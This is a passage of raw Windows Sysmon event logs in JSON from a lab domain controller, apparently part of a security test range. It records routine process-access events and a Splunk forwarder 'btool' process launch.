ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3256,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.844\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.844","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3257,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.844\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.844","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3258,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.844\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.844","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3259,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.860\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-0010375D0500}\r\nTargetProcessId: 1524\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.860","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-0010375D0500}","TargetProcessId":"1524","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3260,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.863\r\nProcessGuid: {41C8662E-1FF3-5F25-0000-0010F35D0500}\r\nProcessId: 4632\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool web list settings --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-0010375D0500}\r\nParentProcessId: 1524\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  web list settings --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.863","ProcessGuid":"{41C8662E-1FF3-5F25-0000-0010F35D0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool web list settings --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-0010375D0500}","ParentProcessId":"1524","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  web list settings --no-log","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3261,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.860\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-0010375D0500}\r\nSourceProcessId: 1524\r\nSourceThreadId: 1372\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-0010F35D0500}\r\nTargetProcessId: 4632\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.860","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-0010375D0500}","SourceProcessId":"1524","SourceThreadId":"1372","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-0010F35D0500}","TargetProcessId":"4632","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3262,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.860\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-0010F35D0500}\r\nTargetProcessId: 4632\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.860","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-0010F35D0500}","TargetProcessId":"4632","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3263,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.860\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.860","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3264,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.860\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.860","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
